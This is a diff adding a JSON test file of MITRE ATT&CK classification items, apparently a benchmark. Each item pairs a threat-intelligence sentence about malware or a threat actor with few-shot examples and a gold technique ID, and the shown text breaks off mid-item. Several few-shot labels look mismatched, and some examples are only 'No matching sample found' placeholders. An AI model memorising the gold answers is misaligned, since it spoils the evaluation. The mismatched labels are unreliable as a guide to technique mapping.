diff --git "a/test/procedures_fewshot_rankgpt_test.json" "b/test/procedures_fewshot_rankgpt_test.json" new file mode 100644--- /dev/null +++ "b/test/procedures_fewshot_rankgpt_test.json" @@ -0,0 +1,10604 @@ +[ + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mythic supports custom chunk sizes used to upload/download files.\n\t - T1030: Data Transfer Size Limits\n- Text: SideTwist can embed C2 responses in the source code of a fake Flickr webpage.\n\t - T1001: Data Obfuscation\n- Text: CharmPower can exfiltrate gathered data to a hardcoded C2 URL via HTTP POST.\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "RDAT can upload a file via HTTP POST response to the C2 split into 102,400-byte portions. RDAT can also download data from the C2 which is split into 81,920-byte portions.", + "gold": "- T1030: Data Transfer Size Limits", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once the target\u2019s machine is compromised, the attacker first enumerates all processes running in the system and all services. Then the attacker looks for all administrator accounts on both the local machine and the network. This reflects the Poseidon Group\u2019s familiarity with Windows network administration\n\t - T1057: Process Discovery\n\t - T1007: System Service Discovery\n- Text: Kwampirs collects a list of active and listening connections by using the command \"netstat -nao\" as well as a list of available network mappings with \"net use\".\n\t - T1049: System Network Connections Discovery\n- Text: BloodHound can collect information about domain users, including identification of domain admin accounts.\n\t - T1087.002: Account Discovery - Domain Account\n", + "input": "APT1 used the commands \"net start\" and \"tasklist\" to get a listing of the services on the system.", + "gold": "- T1007: System Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bankshot searches for certain Registry keys to be configured before executing the payload.\n\t - T1012: Query Registry\n- Text: PlugX checks if VMware tools is running in the background by searching for any process named \"vmtoolsd\".\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: After successfully exporting mail they wished to steal, the attacker would remove the evidence of the export request using Remove-MailboxExportRequest\n\t - T1070: Indicator Removal\n", + "input": "SodaMaster has the ability to query the Registry to detect a key specific to VMware.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sykipot may use \"netstat -ano\" to display active network connections.\n\t - T1049: System Network Connections Discovery\n- Text: APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc. Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts. In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment. To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1021.004: Remote Services - SSH\n\t - T1018: Remote System Discovery\n\t - T1560.001: Archive Collected Data - Archive via Utility\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1090.001: Proxy - Internal Proxy\n- Text: Okrum can identify proxy servers configured and used by the victim, and use it to make HTTP requests to C2 its server.\n\t - T1090.002: Proxy - External Proxy\n", + "input": "APT3 has a tool that can enumerate current network connections.", + "gold": "- T1049: System Network Connections Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once the initial computer on the targeted organization\u2019s network is infected with Vcrodat, Whitefly begins mapping the network and infecting further computers. The attackers rely heavily on tools such as Mimikatz to obtain credentials. Using these credentials, the attackers are able to compromise more machines on the network and, from those machines, again obtain more credentials\n\t - T1588.002: Obtain Capabilities - Tool\n\t - T1068: Exploitation for Privilege Escalation\n- Text: The actors used a variety of public exploits, including CVE 2020-0688 and CVE 2020-17144 to gain privileged remote code execution on vulnerable Microsoft Exchange servers. In some cases, this exploitation occurred after valid credentials were identified by password spray, as these vulnerabilities require authentication as a valid user.\n\t - T1190: Exploit Public-Facing Application\n- Text: Following the reconnaissance phase, the threat actor attempted to dump credentials stored on the compromised machines. The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes. This version of mimikatz did not require any command line arguments, most likely in an attempt to avoid detection based on command-line auditing. The dumped hashes were used to authenticate to other machines via pass the hash\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n", + "input": "Magic Hound has obtained and used open-source penetration testing tools like Havij, sqlmap, Metasploit, and Mimikatz.", + "gold": "- T1588.002: Obtain Capabilities - Tool", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AppleSeed can decode its payload prior to execution.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: FLASHFLOOD employs the same encoding scheme as SPACESHIP for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: Earlier versions of UPPERCUT used the hard-coded string \u201cthis is the encrypt key\u201d for Blowfish encryption when communicating with a C2. However, in the latest version, the keys are hard-coded uniquely for each C2 address and use the C2\u2019s calculated MD5 hash to determine which key to use, as shown in Figure 10\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "FoggyWeb can be decrypted in memory using a Lightweight Encryption Algorithm (LEA)-128 key and decoded using a XOR key.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ryuk attempts to encrypt all mounted drives and hosts that have Address Resolution Protocol (ARP) entries (IP addresses) and it enumerates all mounted drives by calling GetLogicalDrives. For each mounted drive, Ryuk calls GetDriveTypeW to determine the drive\u2019s type. To retrieve IP addresses that have ARP entries, Ryuk calls GetIpNetTable. It iterates through all entries and then tries to enumerate files and folders on the remote host and encrypt the files\n\t - T1057: Process Discovery\n- Text: Tools CTU researchers observed BRONZE UNION using the following tools in intrusions since the 2015 analysis, but clients should assume that the threat group still has access to the previously reported tools\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: PlugX checks if VMware tools is running in the background by searching for any process named \"vmtoolsd\".\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "Kazuar obtains a list of running processes through WMI querying and the \"ps\" command.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Deletes rules in the Windows Defender Firewall exception list related to AnyDesk \n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n- Text: During Night Dragon, threat actors disabled anti-virus and anti-spyware tools in some instances on the victim\u2019s machines. The actors also disabled proxy settings to allow direct communication from victims to the Internet.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: AppleSeed has exfiltrated files using web services.\n\t - T1567: Exfiltration Over Web Service\n", + "input": "H1N1 kills and disables services for Windows Firewall.", + "gold": "- T1562.004: Impair Defenses - Disable or Modify System Firewall", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Forfiles can be used to locate certain types of files/directories in a system.(ex: locate all files with a specific extension, name, and/or age)\n\t - T1083: File and Directory Discovery\n- Text: has a command to upload information about all running processes to its C2 server.\n\t - T1057: Process Discovery\n- Text: 2. The macro decodes the dropped files using Windows certutil.exe (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows). 3. The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) (esentutil.exe is also a legitimate program that is pre-installed in Windows). The dropped files include the following: GUP.exe : GUP, a free (LGPL) Generic Updater. GUP is an open source binary used by Notepad++ for software updates\n\t - T1055.012: Process Injection - Process Hollowing\n\t - T1106: Native API\n\t - T1036: Masquerading\n\t - T1010: Application Window Discovery\n", + "input": "ELMER is capable of performing process listings.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine then download and execute a payload from a remote C2 server. The VBScript file is given a name that impersonates legitimate Windows tasks and is either stored in the registry of the compromised system or in an obfuscated format on disk\n\t - T1105: Ingress Tool Transfer\n- Text: APT39 has used various tools to steal files from the compromised host.\n\t - T1005: Data from Local System\n- Text: Downloaded payload is a variant of a cloud-based RAT known as RokRat which has been used by this group since 2017. This RAT is known to steal data from a victim\u2019s machine and send them to cloud services (Pcloud, Dropbox, Box, Yandex\n\t - T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage\n", + "input": "APT18 can upload a file to the victim\u2019s machine.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT39 has used Ncrack to reveal credentials.\n\t - T1110: Brute Force\n- Text: HEXANE has used password spraying attacks to obtain valid credentials.\n\t - T1110.003: Brute Force - Password Spraying\n- Text: Besides of fetching a list of scanning targets, Xbash will also request C2 server via URI \u201c/p\u201d to fetch a list of weak passwords for brute forcing\n\t - T1110.001: Brute Force - Password Guessing\n", + "input": "Dragonfly has attempted to brute force credentials to gain access.", + "gold": "- T1110: Brute Force", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The actors used two Impacket tools: wmiexec.py and smbexec.py.\n\t - T1059.006: Command and Scripting Interpreter - Python\n- Text: After deobfuscation you can see \u201cImminent Monitor\u201d string which may indicate it is related to Imminent Monitor RAT\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1123: Audio Capture\n\t - T1125: Video Capture\n- Text: JCry has used PowerShell to execute payloads.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "Machete is written in Python and is used in conjunction with additional Python scripts.", + "gold": "- T1059.006: Command and Scripting Interpreter - Python", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Winnti Group has downloaded an auxiliary program named ff.exe to infected machines.\n\t - T1105: Ingress Tool Transfer\n- Text: The C&C domain android[.]viral91[.]xyz, where the malware was connecting to also shows that it is very likely that the APT team uses subdomains to host or connect to Android malware. In previous years, some CrimsonRAT samples were also found to be hosted on the viral91[.]xyz domain.\n\t - T1584.001: Compromise Infrastructure - Domains\n\t - T1583.001: Acquire Infrastructure - Domains\n\t - T1587.001: Develop Capabilities - Malware\n\t - T1588.001: Obtain Capabilities - Malware\n- Text: Earth Lusca has staged malware and malicious files on compromised web servers, GitHub, and Google Drive.\n\t - T1608.001: Stage Capabilities - Upload Malware\n", + "input": "During FunnyDream, the threat actors downloaded additional droppers and backdoors onto a compromised system.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has a built-in keylogger.\n\t - T1056: Input Capture\n- Text: Industroyer has used a Trojanized version of the Windows Notepad application for an additional backdoor persistence mechanism.\n\t - T1554: Compromise Host Software Binary\n- Text: No matching sample found for T1563.001\n", + "input": "Kobalos has used a compromised SSH client to capture the hostname, port, username and password used to establish an SSH connection from the compromised host.", + "gold": "- T1056: Input Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This is the final payload that has been deployed as a service using svchost.exe. This Rat is heavily obfuscated and is using multiple anti-analysis techniques. It has a custom section named \u201cqwdfr0\u201d which performs all the de-obfuscation process. This payload register itself as a service using its export function ServiceMain\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This configuration file contains the same actor pool and wallet information as the first. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. TermsHost.exe\" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample also creates the UPX-packed file \"dDNLQrsBUE.url\" in the Windows Start Menu Folder\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: The PipeMon installer has modified the Registry key \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Print Processors\" to install PipeMon as a Print Processor.\n\t - T1547.012: Boot or Logon Autostart Execution - Print Processors\n", + "input": "Ursnif has registered itself as a system service in the Registry for automatic execution at system startup.", + "gold": "- T1543.003: Create or Modify System Process - Windows Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing malicious attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: Bundlore has attempted to get users to execute a malicious .app file that looks like a Flash Player update.\n\t - T1204.002: User Execution - Malicious File\n", + "input": "Machete has delivered spearphishing emails that contain a zipped file with malicious contents.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 1) QEMU Linux images. 2) Shell scripts used to launch the QEMU images. 3) Daemons used to start the shell scripts at boot and keep them running. 4) A CPU monitor shell script with an accompanying daemon that can start/stop the mining based on CPU usage and whether the Activity Monitor process is running\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n- Text: macOS.OSAMiner has used `osascript` to call itself via the `do shell script` command in the Launch Agent `.plist` file.\n\t - T1059.002: Command and Scripting Interpreter - AppleScript\n- Text: Dok uses AppleScript to install a login Item by sending Apple events to the \"System Events\" process.\n\t - T1547.015: Boot or Logon Autostart Execution - Login Items\n", + "input": "WindTail can use the \"open\" command to execute an application.", + "gold": "- T1059.004: Command and Scripting Interpreter - Unix Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: We would like to thank White-Hat, Tom Lancaster of Palo Alto Networks, Michael Yip of Stroz Friedberg, security researcher Marcus, and other security researchers and organizations who shared information and provided feedback\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Meteor can use `wmic.exe` as part of its effort to delete shadow copies.\n\t - T1047: Windows Management Instrumentation\n- Text: Chaes has collected the username and UID from the infected machine.\n\t - T1033: System Owner/User Discovery\n", + "input": "Action RAT can use WMI to gather AV products installed on an infected host.", + "gold": "- T1047: Windows Management Instrumentation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Silence has used Nmap to scan the corporate network, build a network topology, and identify vulnerable hosts.\n\t - T1018: Remote System Discovery\n- Text: Its functions include self-starting of the backdoor, collection of network configuration, keystroke records, and schedule other modules to execute by means of timers\n\t - T1016: System Network Configuration Discovery\n- Text: No matching sample found for T1557.002\n", + "input": "Arp can be used to display a host's ARP cache, which may include address resolutions for remote systems.", + "gold": "- T1018: Remote System Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SDBbot has the ability to inject a downloaded DLL into a newly created rundll32.exe process.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: Stuxnet reduces the integrity level of objects to allow write actions.\n\t - T1562: Impair Defenses\n- Text: Ramsay can insert itself into the address space of other applications using the AppInit DLL Registry key.\n\t - T1546.010: Event Triggered Execution - AppInit DLLs\n", + "input": "Ramsay can use \"ImprovedReflectiveDLLInjection\" to deploy components.", + "gold": "- T1055.001: Process Injection - Dynamic-link Library Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SideCopy has delivered trojanized executables via spearphishing emails that contacts actor-controlled servers to download malicious payloads.\n\t - T1105: Ingress Tool Transfer\n- Text: The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely invoke an encoded PowerShell command on target systems to execute the payload\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1570: Lateral Tool Transfer\n- Text: Metamorfo has used MsiExec.exe to automatically execute files.\n\t - T1218.007: System Binary Proxy Execution - Msiexec\n", + "input": "ZIRCONIUM has used tools to download malicious files to compromised hosts.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bundlore changes the permissions of a payload using the command \"chmod -R 755\".\n\t - T1222.002: File and Directory Permissions Modification - Linux and Mac File and Directory Permissions Modification\n- Text: No matching sample found for T1548.001\n- Text: CallMe has the capability to create a reverse shell on victims.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n", + "input": "XCSSET uses the \"chmod +x\" command to grant executable permissions to the malicious file.", + "gold": "- T1222.002: File and Directory Permissions Modification - Linux and Mac File and Directory Permissions Modification", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KONNI has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.\n\t - T1134.002: Access Token Manipulation - Create Process with Token\n- Text: Peirates gathers Kubernetes service account tokens using a variety of techniques.\n\t - T1528: Steal Application Access Token\n- Text: APT29 has used compromised service principals to make changes to the Office 365 environment.\n\t - T1550.001: Use Alternate Authentication Material - Application Access Token\n", + "input": "Empire can use \"Invoke-RunAs\" to make tokens.", + "gold": "- T1134.002: Access Token Manipulation - Create Process with Token", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stealth Falcon demonstrates some familiarity with the patterns of behavior, interests, and activities of its targets, suggesting that the operators may have been working with other sources of information about their targets\u2019 behaviors. In addition, Stealth Falcon displayed above-average operational security throughout the campaign. Stealth Falcon also shows familiarity with creating and maintaining a range of fictitious personas, and registering and managing a significant amount of attack and C2 infrastructure with concern for operational security\n\t - T1041: Exfiltration Over C2 Channel\n- Text: CORALDECK has exfiltrated data in HTTP POST headers.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks\n\t - T1020: Automated Exfiltration\n", + "input": "Lokibot has the ability to initiate contact with command and control (C2) to exfiltrate stolen data.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: iKitten will zip up the /Library/Keychains directory before exfiltrating it.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server. malware RomeoDelta archives specified directories in .zip format, encrypts the .zip file, and uploads it to its C2 server.\n\t - T1560: Archive Collected Data\n- Text: The implant has the capability of gathering data from the victim\u2019s system. The following information will be gathered and sent to the command and control server\n\t - T1560.002: Archive Collected Data - Archive via Library\n", + "input": "FIN8 has used RAR to compress collected data before exfiltration.", + "gold": "- T1560.001: Archive Collected Data - Archive via Utility", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk.\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n- Text: Earth Lusca has placed a malicious payload in `%WINDIR%\\SYSTEM32\\oci.dll` so it would be sideloaded by the MSDTC service.\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: The actors split some archived exfiltration files into chunks 